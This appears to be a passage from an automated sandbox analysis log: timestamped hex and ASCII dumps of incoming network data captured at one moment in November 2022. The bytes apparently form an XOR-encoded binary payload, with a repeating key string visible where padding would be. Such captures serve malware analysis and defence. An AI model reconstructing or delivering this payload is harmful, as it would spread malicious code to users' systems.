2022-11-07 22:49:05 UTC	5608	IN	Data Raw: 30 3a 30 fb 8d 57 25 ed b6 3f ed a7 2e e1 af 3f f1 b6 3c ec a3 2f 43 9e 9c 51 28 88 9c 2c fd 27 42 61 30 f1 93 26 e5 bc 33 58 70 4a 2a e1 b0 3b 51 a4 38 5c a7 2b 65 2a b5 35 40 bd 14 7b 3e e2 22 4d 58 31 e8 96 20 ed 9b 9b 2b 86 99 97 31 f0 bc 4d 2b 3b 33 26 36 ae 3d f0 a9 3f ee 6c b5 d4 66 69 30 f5 74 ac ac 64 7a 9b 3b 22 66 68 e9 e3 e8 e5 e0 f5 fc f7 fa fd e4 e9 e9 e7 f3 29 f5 87 4e 25 f3 21 69 23 e7 30 5e 23 2c e7 b6 20 52 62 35 5c ba 2c 45 a7 26 e4 ac 31 50 a7 2a 58 b6 27 69 2e b8 34 58 b5 1b 6a 36 fa 30 4a 36 20 fa b7 50 9c 97 82 93 98 23 e4 a4 34 f0 ae 2b ec 63 02 a6 69 78 30 ec 62 37 db 7a 73 8c 90 2d 68 79 e3 e8 e5 e0 f5 fc f7 fa fd e4 e9 e9 e7 f3 29 f5 87 4e 25 f3 29 69 23 e7 38 5e 23 2c e7 b6 20 52 62 31 5c b0 29 e5 b7 22 44 a4 30 40 b7 2f 6e 31 Data Ascii: 0:0W%?.?</CQ(,'Ba0&3XpJ;Q8\+e5@{>"MX1 +1M+;3&6=?lfi0tdz;"fh)N%!i#0^#, Rb5\,E&1P*X'i.4Xj60J6 P#4+cix0b7zs-hy)N%)i#8^#, Rb1\)"D0@/n1
2022-11-07 22:49:05 UTC	5624	IN	Data Raw: 99 96 87 87 9e 90 53 2c 43 b0 13 46 2e d0 86 8c 87 8a 8f 9a 93 58 22 e0 23 78 31 4e a1 16 57 23 eb 22 7a 90 74 7c 6c 64 32 fa 1a 7e 2e e1 7f 3b f1 b4 9b e4 24 ea 67 bf 2f 79 79 9f ae 7f 76 6b 8e 71 65 78 61 ff fc f4 ea e3 f4 fe f6 2d 48 ba 30 f8 31 75 24 ee 6b 84 d5 a7 86 88 f3 24 47 a2 2e e4 39 68 29 e6 6d 8d 0b ac 9b 91 f6 20 f4 32 68 3d f9 64 20 ec 68 25 f9 3b 69 3b 5a a1 02 46 2a e0 79 34 ea 2d 7c 28 f3 32 74 22 ed 2a 71 3b f1 77 41 a5 24 a0 28 65 74 79 79 77 2f e8 37 63 00 e0 3a 68 a2 60 73 e0 7a 73 64 6e 66 9b 76 1c 3a 65 7f 74 2d 77 81 be e4 e9 e9 e7 f3 2d fd 21 6e 21 f5 39 71 27 e5 65 36 f8 66 26 eb 2a 69 3f 41 b5 04 4c 20 ee 6b 21 ff 3b 69 3f ea 63 47 ab 2a e0 31 70 2d e6 2d 74 32 b4 26 66 66 68 79 73 1e fc 32 75 af 68 75 e9 74 79 79 77 63 92 79 Data Ascii: S,CF.X"#x1NW#"zt\|ld2~.;$g/yyvkqexa-H01u$k$G.9h)m 2h=d h%;i;ZFy4-\|(2t"q;wA$(etyyw/7c:h`szsdnfv:et-w-!n!9q'e6f&i?AL k!;i?cG1p--t2&ffhys2uhutyywcy
2022-11-07 22:49:05 UTC	5640	IN	Data Raw: 66 69 78 78 61 6f 6c 64 7a 73 64 6e 66 68 79 73 78 75 70 65 6c 67 6a 6d 74 79 79 77 63 61 76 6b 66 69 78 78 61 6f 6c 64 7a 73 64 6e 66 68 79 73 78 75 70 65 6c 67 6a 6d 74 79 79 77 63 61 76 6b 66 69 78 78 61 6f 6c 64 7a 73 64 6e 66 68 79 73 78 75 70 65 6c 67 6a 6d 74 79 79 77 63 61 76 6b 66 69 78 78 61 6f 6c 64 7a 73 64 6e 66 68 79 73 78 75 70 65 6c 67 6a 6d 74 79 79 77 63 61 76 6b 66 69 78 78 61 6f 6c 64 7a 73 64 6e 66 68 79 73 78 75 70 65 6c 67 6a 6d 74 79 79 77 63 61 76 6b 66 69 78 78 61 6f 6c 64 7a 73 64 6e 66 68 79 73 78 75 70 65 6c 67 6a 6d 74 79 79 77 63 61 76 6b 66 69 78 78 61 6f 6c 64 7a 73 64 6e 66 68 79 73 78 75 70 65 6c 67 6a 6d 74 79 79 77 63 61 76 6b 66 69 78 78 61 6f 6c 64 7a 73 64 6e 66 68 79 73 78 75 70 65 6c 67 6a 6d 74 79 79 77 63 61 76 Data Ascii: fixxaoldzsdnfhysxupelgjmtyywcavkfixxaoldzsdnfhysxupelgjmtyywcavkfixxaoldzsdnfhysxupelgjmtyywcavkfixxaoldzsdnfhysxupelgjmtyywcavkfixxaoldzsdnfhysxupelgjmtyywcavkfixxaoldzsdnfhysxupelgjmtyywcavkfixxaoldzsdnfhysxupelgjmtyywcavkfixxaoldzsdnfhysxupelgjmtyywcav
2022-11-07 22:49:05 UTC	5656	IN	Data Raw: 99 96 87 87 9e 6f 6c 64 7a 73 64 6e 66 97 86 8c 87 8a 8f 9a 93 67 6a 6d 74 79 79 77 63 9e 89 94 99 96 87 87 9e 6f 6c 64 7a 73 64 6e 66 68 79 73 78 75 70 65 6c 67 6a 6d 74 79 79 77 63 d1 f9 68 26 68 78 78 61 cf e0 67 3a 72 64 6e 66 28 e9 70 38 74 70 65 6c a7 e6 6e 34 78 79 77 63 e1 fa 68 26 68 78 78 61 6f 6c 64 7a 73 64 6e 66 d8 f6 70 38 74 70 65 6c 67 e7 6e 34 78 79 77 63 21 e6 68 26 68 78 78 61 2f e1 67 3a 72 64 6e 66 28 f3 70 38 74 70 65 6c 67 6a 6d 74 79 79 77 63 21 e6 68 26 68 78 78 61 ef e1 67 3a 72 64 6e 66 18 f5 70 38 74 70 65 6c 67 6a 6d 74 79 79 77 63 21 e6 68 26 68 78 78 61 af e1 67 3a 72 64 6e 66 18 f5 70 38 74 70 65 6c 67 6a 6d 74 79 79 77 63 21 e6 68 26 68 78 78 61 6f e2 67 3a 72 64 6e 66 18 f5 70 38 74 70 65 6c 67 6a 6d 74 79 79 77 63 21 e6 Data Ascii: oldzsdnfgjmtyywcoldzsdnfhysxupelgjmtyywch&hxxag:rdnf(p8tpeln4xywch&hxxaoldzsdnfp8tpelgn4xywc!h&hxxa/g:rdnf(p8tpelgjmtyywc!h&hxxag:rdnfp8tpelgjmtyywc!h&hxxag:rdnfp8tpelgjmtyywc!h&hxxaog:rdnfp8tpelgjmtyywc!
2022-11-07 22:49:05 UTC	5672	IN	Data Raw: 66 a9 d6 7a 61 33 c3 66 7a 67 9b 6d 66 08 d6 71 78 43 c0 67 6c 47 95 6e 74 39 c9 75 63 98 c6 69 66 2d 87 7b 61 6f dd 66 7a 52 d5 6c 66 c0 86 70 78 45 c1 67 6c 97 db 6f 74 11 86 74 63 91 c7 69 66 4d ca 7a 61 43 6c 60 7a 43 d6 6c 66 24 cb 71 78 69 70 61 6c 37 d8 6f 74 11 cb 75 63 01 89 68 66 19 ca 7a 61 d2 de 66 7a 67 64 6a 66 a8 cb 71 78 95 c2 67 6c 43 6a 69 74 99 cb 75 63 61 c5 69 66 d9 87 7b 61 6f df 66 7a 2a d7 6c 66 b0 79 77 78 15 c3 67 6c f1 d9 6f 74 b9 86 74 63 c1 c5 69 66 ba cb 7a 61 8f 93 67 7a 93 d7 6c 66 4c cd 71 78 a5 70 61 6c 57 de 6f 74 f3 cd 75 63 1d 76 6f 66 f9 cc 7a 61 a3 d8 66 7a 27 64 6a 66 b8 cd 71 78 65 c5 67 6c 03 6a 69 74 69 cc 75 63 ea c3 69 66 85 78 7c 61 ff d9 66 7a a3 d1 6c 66 d0 86 70 78 a5 c5 67 6c b9 df 6f 74 2d 87 74 63 81 c3 Data Ascii: fza3fzgmfqxCglGnt9ucif-{aofzRlfpxEglottcifMzaCl`zClf$qxipal7otuchfzafzgdjfqxglCjitucaif{aofz*lfywxglottcifzagzlfLqxpalWotucvofzafz'djfqxegljitiucifx\|afzlfpxglot-tc
2022-11-07 22:49:05 UTC	5688	IN	Data Raw: 66 68 7e 7b 61 69 ee 66 4a 72 14 6e 66 69 72 75 78 7e 02 62 5c 61 0a 68 04 7d b9 75 b3 60 78 63 66 67 0a 72 51 66 0c 6c 0a 74 34 68 a6 6c a9 71 98 74 79 60 6c 6e e8 68 44 7d 19 74 13 63 b6 6b 66 68 7c 79 61 6b 2e 64 7a 72 64 6e 66 69 7d 72 78 71 d2 65 6c 66 62 69 74 71 2b 73 53 62 16 69 a6 68 76 70 61 61 3e 6e 4a 7a 04 66 16 6f 29 75 b8 71 a0 67 8c 66 6f 6f 74 7c 4b 76 53 60 76 6b 66 68 78 78 61 6e 68 65 7a 77 26 6e 66 69 7e 70 78 72 32 66 5c 65 aa 6d 74 78 79 77 63 60 76 6b 66 68 78 78 61 6e 6c 64 7a 73 64 6e 66 68 79 73 78 75 70 65 6c 67 6a 6d 74 79 79 77 63 61 76 6b 66 69 78 78 61 6f 6c 64 7a 73 64 6e 66 68 79 73 78 75 70 65 6c 67 6a 6d 74 79 79 77 63 61 76 6b 66 69 78 78 61 6f 6c 64 7a 73 64 6e 66 68 79 73 78 75 70 65 6c 67 6a 6d 74 79 79 77 63 61 76 Data Ascii: fh~{aifJrnfirux~b\ah}u`xcfgrQflt4hlqty`lnhD}tckfh\|yak.dzrdnfi}rxqelfbitq+sSbihvpaa>nJzfo)uqgfoot\|KvS`vkfhxxanhezw&nfi~pxr2f\emtxywc`vkfhxxanldzsdnfhysxupelgjmtyywcavkfixxaoldzsdnfhysxupelgjmtyywcavkfixxaoldzsdnfhysxupelgjmtyywcav
2022-11-07 22:49:05 UTC	5704	IN	Data Raw: db 01 7f c8 11 0e 71 17 a5 df b9 98 d8 b4 4f 61 06 29 10 1c d2 02 0e 62 58 6b df 2b d3 32 bf 11 fe 68 6d f0 a6 e8 d1 e5 ea 5e c9 3a 2d 24 75 a9 35 ba f7 c4 bd 32 a4 a4 0f 9a d5 bd 2a 4e cd 49 44 48 75 16 af eb 4d b9 11 79 5b 11 c6 41 2b b7 39 77 ed ea d1 44 f8 ce 2f d2 6d 8a 98 3d 0c 00 fa ae 62 9e 85 b9 a5 98 96 94 79 ff 08 ce 52 10 4f 9b 0b 92 03 da 0b 5a d9 07 10 7d 4c a7 9d 5f dd 57 71 90 c8 ef 01 88 60 ee ed 14 f5 5b 12 93 2b 72 57 ef a2 a7 27 ca 96 73 eb 8b 3c 90 21 7d 8e 0a 9f aa 30 9a 61 ea f3 5e d2 ac f7 a8 3c e1 30 f5 f7 37 41 e3 9e 00 06 78 9c b8 f8 b9 47 95 4d cf d2 dd 58 10 56 a3 f0 09 b1 95 41 c8 85 ff a6 66 b0 97 ec 99 f8 93 dc 3b aa 78 2a c6 e5 d1 6a 0d cc 70 b7 d7 ae 99 78 99 23 33 dc 8f 7b 70 79 75 71 c6 ed e6 5a 12 44 68 7f 7e 03 e7 3e Data Ascii: qOa)bXk+2hm^:-$u52NIDHuMy[A+9wD/m=byROZ}L_Wq`[+rW's<!}0a^<07AxGMXVAf;xjpx#3{pyuqZDh~>
2022-11-07 22:49:05 UTC	5720	IN	Data Raw: 23 ff 54 27 9e ad 83 94 53 b4 f4 4f 36 c7 31 6f da 6c 7f a3 42 3e 06 7c 16 d5 d2 a8 de e1 4a c5 27 7f 6f c8 14 99 85 db c5 24 57 ab 07 40 ea 1a 30 e6 a9 3d b5 33 32 a8 ac eb 80 8a 73 58 3e 97 9b bb c8 f2 03 a0 aa 60 4d 73 ee 25 60 20 c6 6c ed f3 40 b6 90 90 21 1d ba db 9f 95 71 2b 36 e1 69 a6 c0 e6 ce 1f 04 44 af 4a ef 86 11 66 53 99 1a 0e 91 d6 e7 9f 70 22 75 3e d0 f2 71 4a 6c 37 2a 09 83 d2 91 4e be 94 a1 32 b8 58 66 00 21 5f 8b 7a 5d b1 39 66 2f 4c 62 7d 40 5b 6f 52 3a c4 35 d5 ba 9a 0d 4b 07 2c 4f 2c 28 ae a5 e2 27 40 23 ea a3 23 ec 2b ef f3 3f 7c 7a dd 63 56 69 ef 1e 7c 88 31 e0 97 c3 2e 82 1d 61 08 c6 6a d6 61 a2 a5 c0 0f 39 66 df 32 48 fc 2f 54 0a d7 ec 9a dd cb 68 20 bd b9 92 54 95 3a 67 64 c8 d0 49 10 43 a2 00 95 a3 70 2c 7e 76 e6 57 af b6 28 ae Data Ascii: #T'SO61olB>\|J'o$W@0=32sX>`Ms%` l@!q+6iDJfSp"u>qJl7*N2Xf!_z]9f/Lb}@[oR:5K,O,('@##+?\|zcVi\|1.aja9f2H/Th T:gdICp,~vW(
2022-11-07 22:49:05 UTC	5736	IN	Data Raw: 0a 5d 20 df bb f2 22 35 67 83 b0 b0 cd a2 0f 1b b5 71 06 63 1c 98 4e 9b 46 3f f0 f6 fd 1b a6 85 0a bd 65 10 2e 2d 4e a1 7c 2a a1 4b 32 88 7a cd 30 a6 9d 5b 22 26 6e 41 85 6d b7 db e0 85 36 c6 96 e4 36 69 88 bc ba 34 09 44 0c a8 99 01 31 58 8d 49 1f 2c cc 5b 93 1b 2c 4c 49 97 3a ca 09 41 8c 98 74 60 ed 87 09 70 7b e7 34 24 73 1a 51 7b f8 77 5a 60 f7 aa 6e 88 a2 a3 e0 28 0f a0 f4 17 24 72 83 37 7d 42 a2 07 0b ba de 69 76 d4 36 d0 29 16 02 5f 54 33 dd 3d 9b fd 79 4c 1a 6c 81 b1 80 55 55 55 44 63 33 07 91 50 56 af 87 71 15 27 7b d4 79 61 be 6f 68 b4 1f df 09 35 d9 f5 0c e3 34 c5 f8 43 ec a2 2d 50 5f 63 68 0b 3f bf b1 70 12 71 5f 66 ce 43 6c 63 1c fd a5 32 78 54 54 54 44 11 74 68 98 2d 5b e2 10 77 6d 3c 5a 21 6f ed 80 bf de 55 6f 9d e8 a0 cd 88 b7 ce 8a 25 fb Data Ascii: ] "5gqcNF?e.-N\|*K2z0["&nAm66i4D1XI,[,LI:At`p{4$sQ{wZ`n($r7}Biv6)_T3=yLlUUUDc3PVq'{yaoh54C-P_ch?pq_fClc2xTTTDth-[wm<Z!oUo%
2022-11-07 22:49:05 UTC	5752	IN	Data Raw: 1d 77 7e fc f1 e0 5b cd 7b f0 f1 d1 24 2b 60 5c 7e 4e ba a4 96 b2 4a 50 20 45 75 77 ba 60 5d ea 5d 52 65 ae 12 7f ac f5 70 b0 fb 09 44 e8 57 d6 37 71 e7 16 36 2a 6f 8d 2b 14 31 19 a9 23 eb e1 ad a2 ac e3 5d eb 96 13 0d 3b e5 8d a7 e9 6f 53 0f 19 36 60 76 8c 03 0b 64 29 74 61 52 d5 60 a2 0a 09 cb 97 57 6b 6f 8e aa ee e6 aa 1c a4 fb 9c 29 72 61 10 57 98 ad e0 ff f8 16 90 e6 5c 83 b1 bb 25 fe 11 a2 45 ee 11 0f a2 05 73 7e 71 b4 ec a7 55 ee ff 1d 2e 41 b2 8a a6 48 db 57 78 e9 24 07 f1 c8 a8 ab a3 ec a5 ba d9 87 8c 92 22 74 ed fe d4 b2 7f ea 53 4a b3 44 77 77 2f a1 c6 30 29 a0 e6 d0 6e 29 8f 61 87 32 a7 0c 6e 76 5f 75 5c b9 7e 14 38 ae 07 28 33 83 7d 14 e4 3d e4 0a 34 cc 0e 2e 88 2f c1 54 f8 be 50 25 3b 2e c4 08 02 5c e0 88 34 dc 37 b8 a9 80 ff 44 28 f5 b3 3c Data Ascii: w~[{$+`\~NJP Euw`]]RepDW7q6*o+1#];oS6`vd)taR`Wko)raW\%Es~qU.AHWx$"tSJDww/0)n)a2nv_u\~8(3}=4./TP%;.\47D(<
2022-11-07 22:49:05 UTC	5768	IN	Data Raw: f3 91 99 4c 31 23 6f dc 43 f9 ec 59 a2 db f2 2c e3 30 4e f1 e3 65 7f 50 fc 89 07 79 68 a9 ef 11 b1 ee fb 05 45 71 10 bf 76 06 6b 8d 6e 71 05 0f 6b aa 46 46 e8 e3 fb 6a 44 71 8f b1 d4 7f c3 bc 2f 68 82 c4 fb 0c ee 7f 62 4b e0 94 0e d7 ab 38 ff 04 05 15 4a 1f 0a 6d f4 da 73 f0 0e bb 09 17 f1 1f 62 67 1f 60 e4 ed 07 4f 0d 93 6d 2a be 24 f5 38 10 4d ec d0 55 c0 30 44 21 9c 39 29 c8 74 42 69 b5 98 9f 11 2f 2d 6a e7 1e 59 69 82 f1 64 f8 8e d4 95 d5 71 07 35 36 88 94 31 69 f4 6b 6b cc db 0d 6a be be fc 1c 55 c3 60 55 87 72 16 3c 95 c7 2e b2 38 f7 5a 31 a6 30 39 0f 03 f0 78 39 66 6a 31 63 c1 57 0f 87 1a 27 39 34 a4 18 dd 54 3a f1 67 3a 11 47 38 6c ab 03 52 a0 c0 47 65 4c e0 e8 4a 4e 72 6a b6 53 51 7c b1 3c 42 c2 8d ee 4e fe d1 0c 26 b0 85 1c 3b 32 75 bc 62 4c e3 Data Ascii: L1#oCY,0NePyhEqvknqkFFjDq/hbK8Jmsbg`Om*$8MU0D!9)tBi/-jYidq561ikkjU`Ur<.8Z109x9fj1cW'94T:g:G8lRGeLJNrjSQ\|<BN&;2ubL
2022-11-07 22:49:05 UTC	5784	IN	Data Raw: 71 39 08 81 66 1a 87 8f 73 1a 11 bc 6e 74 63 62 b0 ee 38 2b 4f 6c 67 87 b9 30 7d 5e 9c 5c 34 e5 e4 76 2e e7 29 68 25 f9 1f 22 9e 21 67 44 db 83 a2 01 56 1a 06 67 ed c6 9f d0 b3 9c 8d fa 76 b5 1a aa 6b 70 41 b8 a2 b2 07 58 10 44 0b ea e3 b1 6a 27 2e 14 1c b3 4b 89 2d 0d 6c 7e c5 01 42 e9 17 68 1d 1b 7c 4e bb eb 53 4c 84 74 67 9e 11 fc c0 77 59 37 c6 75 ae 25 21 7c 4d e6 b9 1e ff 22 84 6b a8 81 48 34 5f 2d e2 e3 cd 66 1b 4d e1 08 5b eb ec de a1 4d 44 4e eb 05 ff a1 98 cc 4b 3f eb 22 7e 53 8d e7 34 64 db b9 9a 94 11 7c b5 26 91 6e 2f 62 f7 43 b4 32 73 7c a7 48 58 66 fa 9c 87 bb 6e 30 58 6a d1 7d 53 cb 6f 8e ae 18 d1 ad 56 b1 2b bf 5e 2d 36 72 d8 5d d4 db 2c db ee 71 0a 3d 4b 8b c1 86 1b 4e 07 6f d9 6e 4b 28 65 63 3c fe b5 27 23 07 4f 0c 52 73 29 10 08 62 0e Data Ascii: q9fsntcb8+Olg0}^\4v.)h%"!gDVgvkpAXDj'.K-l~Bh\|NSLtgwY7u%!\|M"kH4_-fM[MDNK?"~S4d\|&n/bC2s\|HXfn0Xj}SoV+^-6r],q=KNonK(ec<'#ORs)b
2022-11-07 22:49:05 UTC	5800	IN	Data Raw: 96 da 57 37 b8 46 05 7a 84 6b d0 4a ef d7 fe d6 d5 75 f1 6c b1 0d fb 0c d5 06 28 19 d4 7a e5 79 54 09 36 54 9e cd 6c 0e 51 50 cd 6f 75 77 ce 38 3b 7e f1 1a d6 cd 3b 27 2e ba 53 74 e0 80 86 2e 1a 3e f3 ff 6c ab fa 64 64 35 78 60 94 5a eb 4f 41 a4 48 46 8f a7 42 e3 00 fd 89 44 5e 62 c8 ab 50 08 e7 a9 51 10 cb c7 e4 b1 60 9b ea 0b 8f f2 ad 5d 7a 60 1c 25 c2 4f 8b 45 05 fa c5 37 c1 e4 65 3f 14 fd 5d 2c 4f 68 98 63 4f fa b0 e1 92 06 49 5c 51 e5 21 41 5d 3d b2 94 c6 06 5b 2c 75 73 90 28 08 7a a1 59 18 60 e8 6d 64 ce fa 7e 6a a9 1e 8a 3f 50 25 5e 20 05 07 7d 30 fe 69 5d 34 73 0e 2b f8 28 6c fc 76 fc ba e1 b4 99 28 b7 a1 04 0d 38 96 73 2d fa 1d 48 b5 ae 0f 12 77 63 fc 6a 86 8b 0c 22 9a 6b 73 6c 8d 25 9d 53 74 65 e9 6d 3c 5e b3 f1 d3 ad bd 49 ca 79 2e 5e 47 43 2e Data Ascii: W7FzkJul(zyT6TlQPouw8;~;'.St.>ldd5x`ZOAHFBD^bPQ`]z`%OE7e?],OhcOI\Q!A]=[,us(zY`md~j?P%^ }0i]4s+(lv(8s-Hwcj"ksl%Stem<^Iy.^GC.
2022-11-07 22:49:05 UTC	5816	IN	Data Raw: 65 6c 5e ea 0b a7 7a 72 9b 16 f9 1c f7 37 bf 80 7e b5 b8 d0 dc 0f c7 a6 0c 5d 11 c2 05 eb 4e 83 8c 4d f9 b6 eb 85 72 bf eb 3b df de 43 16 8b fe 73 77 29 ea 9c 0e e7 3b 06 79 ed 75 6a 79 94 f7 12 80 b5 b8 72 2b 2e 39 9e 4a 7c 18 96 c3 a9 49 98 9d 2c cb 88 03 ba 8d 7a 7d a2 c9 ef ed 43 bb 2b e0 57 7c 0e 7f 6a 81 ca cd cc 32 27 83 30 4e d4 83 7e 2a 7c e8 07 69 d7 d0 42 e8 52 de 45 c2 05 54 7c 7d f2 48 cf 56 5a 9c 18 6d 9c a8 ed 7b 88 f0 31 ff 38 fe 6a 59 11 21 73 ed 6b 3d 1f 4a f6 88 05 49 f5 f0 3e 7d 03 75 a4 a6 d6 20 59 70 58 76 40 c0 e4 c9 49 a2 34 31 49 77 09 6d 54 55 46 85 4d 86 74 c7 1c d0 b2 91 89 af 68 e8 a8 a3 c5 fa 69 df ca 54 7f 1d c2 6d 61 a1 4d 83 7c 1f 9a 1f 78 6f da e7 eb 51 85 2d 2c d3 8b 5a 53 ee 63 b1 79 05 04 4d 42 a8 b0 3c 29 82 91 39 b5 Data Ascii: el^zr7~]NMr;Csw);yujyr+.9J\|I,z}C+W\|j2'0N~*\|iBRET\|}HVZm{18jY!sk=JI>}u YpXv@I41IwmTUFMthiTmaM\|xoQ-,ZScyMB<)9
2022-11-07 22:49:05 UTC	5832	IN	Data Raw: 7f a5 6b 18 c2 11 f8 75 3c 7c d5 4b e3 b9 78 25 64 97 be f2 cc cd a1 10 7f d2 bd 50 ca 2e b3 48 08 f2 87 f1 ea 31 8d 6d bf 53 37 4c c9 58 a0 93 99 69 d1 2c bc 96 fd 78 a0 63 60 d4 47 90 46 53 3e e0 1d 59 54 c2 fc 76 d6 32 dd 1f c3 79 1f c2 3d 50 3a 5c e7 94 7b 62 f8 3a bf f7 70 ea ff 79 c1 80 40 62 13 5e 8e a5 e5 b2 c6 cf c5 53 0a 45 2d 69 7b f1 14 72 66 e0 8f 1b 15 b3 b6 a6 00 7e b3 c0 35 5a d1 ac d6 cd 52 02 6e c4 a6 57 3b ab cb 46 a6 11 dc 5f b3 90 91 5c 67 5f d2 9e 66 26 27 63 bf 47 44 61 cc 60 9d 4c 41 c8 a2 4b a5 4c 39 34 0e 48 cd a3 58 81 a8 87 77 36 2d 4b a7 ed a0 23 31 31 f4 21 30 66 fd 7f 75 64 15 a0 32 5f 4b b4 b1 7f 1d 88 5e a7 60 52 cf 0d 6d c3 df af 41 56 40 81 a0 0b fc f2 2a c7 53 ab a3 ec 7b 29 41 b5 8d 77 54 e4 4a fa 0c 30 41 3f 00 d8 f2 Data Ascii: ku<\|Kx%dP.H1mS7LXi,xc`GFS>YTv2y=P:\{b:py@b^SE-i{rf~5ZRnW;F_\g_f&'cGDa`LAKL94HXw6-K#11!0fud2_K^`RmAV@*S{)AwTJ0A?
2022-11-07 22:49:05 UTC	5848	IN	Data Raw: ad 93 c8 f8 d0 a1 43 5a 32 92 f1 88 51 d4 76 63 44 bc 43 69 28 d5 cd ae f8 da 45 a0 5d 8e ef 97 64 55 12 cd be e9 55 ec ea ef 66 fc 05 39 61 f3 c9 a5 8f 1c b2 11 69 db cf 29 be c2 0b 45 55 f2 e4 40 41 7d 01 08 6c 2a 1a 77 8e af c3 3d 1e 81 09 6b b3 46 21 5e 0d 85 d9 53 b5 f1 31 e5 7f 5a 01 1d 4a 43 f8 a6 ab 78 f3 c1 1e c7 0d a8 e7 41 45 f4 46 74 5a 55 94 8a 9f 56 84 9c 4b 8f 2e fe 4d de 74 59 d9 6a 76 dc 7c 60 8d fc 4a 0b 68 1d 70 a2 1e 64 86 62 77 e5 32 33 a4 c8 da e3 71 7e 26 47 69 d8 66 f9 4c f4 eb 7a 13 2a a8 cd c0 17 33 18 50 2b 60 26 6b e1 f5 d5 e9 62 27 f1 7f d7 f0 0e 6d 14 23 fb 6d 24 b2 d5 b6 50 32 00 c0 6c 46 7b 72 53 c9 ce 5e f8 77 57 7d 51 66 32 1f 41 2b 77 7e 6e 66 61 ba 5d e2 39 6c 68 49 9e bb d6 c8 77 b5 ad 54 19 3c 11 64 34 c3 4a 1f d4 2c Data Ascii: CZ2QvcDCi(E]dUUf9ai)EU@A}lw=kF!^S1ZJCxAEFtZUVK.MtYjv\|`Jhpdbw23q~&GifLz3P+`&kb'm#m$P2lF{rS^wW}Qf2A+w~nfa]9lhIwT<d4J,
2022-11-07 22:49:05 UTC	5864	IN	Data Raw: dc 1d 99 6c 93 e0 6f 05 ce da bb 47 85 3d 39 c6 e8 b9 cb 7b 42 ed 55 dc 21 01 8f c4 58 c8 0a 41 67 b5 cc f9 87 74 a4 4f 48 41 24 9e 87 72 3e fd 3c 8d 89 3b 7c a9 a7 f9 08 7d 5a 78 70 be 88 c8 cd 21 fc 81 ee 21 dd f4 3c 39 df c8 bc c9 5d 50 55 50 66 a5 2f ea 76 2e d0 d6 c7 f7 2f a8 07 3a a0 af 24 63 87 5b e3 c9 a7 6b 73 66 2d e6 d4 e5 2e 62 98 43 d5 83 f8 b5 bc c1 e6 7f 4e 02 fe a0 41 52 f6 18 e1 4e e3 76 b3 23 64 d2 63 be 6e 61 6f 4d 61 45 10 8e 9d d1 33 89 7f 71 43 14 7e 2a 73 78 f0 51 44 b0 b0 62 c0 5e 62 c7 ed 08 d0 b8 44 2e 45 01 a9 38 e9 d4 ec 6a 27 08 00 43 1a 17 11 e2 f9 19 8e 49 06 24 2a b1 10 5c a1 75 51 5f 46 3e 99 ec 3d ce 58 33 5c 14 27 69 e8 d7 31 5e 5e 93 3c d4 9e 5c fd 43 fa 83 67 ff 27 6e 49 ef e6 35 54 43 93 4a 53 6b 45 d5 10 55 78 21 77 Data Ascii: loG=9{BU!XAgtOHA$r><;\|}Zxp!!<9]PUPf/v./:$c[ksf-.bCNARNv#dcnaoMaE3qC~sxQDb^bD.E8j'CI$\uQ_F>=X3\'i1^^<\Cg'nI5TCJSkEUx!w
2022-11-07 22:49:05 UTC	5880	IN	Data Raw: a7 fd c1 d2 64 f4 7e 17 ce 24 42 60 ce a0 42 b1 fb 51 f0 20 a9 1c 02 8b 5b 20 7f 76 c3 f4 60 3c dc 6a 39 c3 6e cf ab 81 0f e4 18 c3 96 79 eb e3 42 e5 75 dc b0 d7 db e7 72 f0 46 76 26 cd 2e fe 2b 22 18 3d c3 96 c8 23 bb e5 b6 04 ce a1 80 3b f8 74 78 39 c5 a8 c8 b9 3e 0b b6 18 2e 4d e5 02 c3 61 92 4e ad 6a 85 05 53 63 d2 88 40 e0 37 4f 3f 15 4d bb 66 a7 2b 95 ff 64 ee 48 9b cf 3f 57 55 21 b3 41 63 8e 00 0a 68 10 14 66 18 69 f8 16 3c d2 46 24 f1 7a 62 d5 66 77 7d 6b 89 c2 d3 4a d0 68 38 ca 8f f2 04 71 3c f8 60 e7 68 75 00 cc a1 b9 64 ac 22 ee 7e af 62 61 65 b5 2a fe 45 06 c9 2f f9 9a 09 9f d9 39 c6 31 5e e7 2b 8c 76 d1 36 f7 ce 69 8a 2b 29 7f 2d 3a 6b 1b 7d a0 74 71 f4 c2 ce 54 68 c3 54 08 96 70 8c aa 76 38 76 69 26 57 d7 39 69 f8 ee 58 2a 02 39 d0 60 a1 1a Data Ascii: d~$B`BQ [ v`<j9nyBurFv&.+"=#;tx9>.MaNjSc@7O?Mf+dH?WU!Achfi<F$zbfw}kJh8q<`hud"~baeE/91^+v6i+)-:k}tqThTpv8vi&W9iX9`
2022-11-07 22:49:05 UTC	5896	IN	Data Raw: 16 74 b3 3b 6e 0f 7e 64 cc 30 62 ad 25 1a 67 2f 81 c2 a0 0e e2 65 0a 48 cf b1 9d 4e 11 2b de a9 f9 d7 f8 7e 64 af e4 db a5 74 96 2e 1c 1a 88 cc 44 45 31 d8 d0 f6 12 2d 84 2c ef 08 49 fa 35 6b d3 01 0c 17 1e 2c 70 6c fa 32 f4 d9 36 17 73 9f e8 f6 2c 1a 3c ec 6c 68 b4 ee ca 1e 0f d6 2a 6b 8a 5b c7 c6 ef f7 7e de db f0 c8 64 19 00 1e eb 88 67 5f 59 6c d8 e5 17 75 09 a9 47 3c d6 02 d4 b8 db 39 8a ef c5 e4 1e 71 f2 22 8c 38 0d 7c b3 f5 b1 b2 00 5f b7 50 ed 76 ba c3 97 03 e9 4c b9 55 69 75 c6 31 2d 8b 39 7a 1f 38 7e 67 55 3b 6f 48 be dd f8 3d 7b 61 86 16 9e 0a 35 4d 88 78 1e 4e 1e 34 44 c5 94 04 39 66 63 8f 47 a1 4f b1 e5 71 cc 67 72 45 a7 2a 51 77 0f 3f 5f 47 8d d1 67 3e 6d 69 1e 65 e0 fe c3 53 65 d4 63 13 6f 28 46 78 7e ae 75 fb 3c 64 a2 ba 23 19 17 52 92 c4 Data Ascii: t;n~d0b%g/eHN+~dt.DE1-,I5k,pl26s,<lhk[~dg_YluG<9q"8\|_PvLUiu1-9z8~gU;oH={a5MxN4D9fcGOqgrEQw?_Gg>mieSeco(Fx~u<d#R
